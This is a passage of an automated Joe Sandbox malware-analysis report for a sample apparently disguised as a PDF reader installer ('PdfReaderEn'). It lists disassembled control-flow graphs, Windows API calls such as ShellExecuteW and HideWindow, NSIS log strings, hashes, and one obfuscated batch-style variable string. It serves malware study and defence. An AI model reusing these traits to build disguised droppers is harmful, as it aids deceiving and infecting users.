                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                          • String ID: ... %d%%$Set Purse=VZBzPost-Meaning-Pour-Tired-Unsubscribe-Promote-Participants-Composition-PUMl-Movement-Zip-PdTemperature-She-Michel-Product-Promoted-Tire-Grey-Constraints-Continuing-vnHonda-Prayers-qLdJPatents-Fuck-Report-Carbon-Spam-Gd-Mailing-WaDMultim$X1C$X1C
                                                                                                                                                                                          • API String ID: 651206458-1540324791
                                                                                                                                                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                          • GlobalFree.KERNELBASE(008B8C98), ref: 00402387
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                                          • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                          • API String ID: 1459762280-1711415406
                                                                                                                                                                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                          • GlobalFree.KERNELBASE(008B8C98), ref: 00402387
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                          • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                          • API String ID: 247603264-1827671502
                                                                                                                                                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
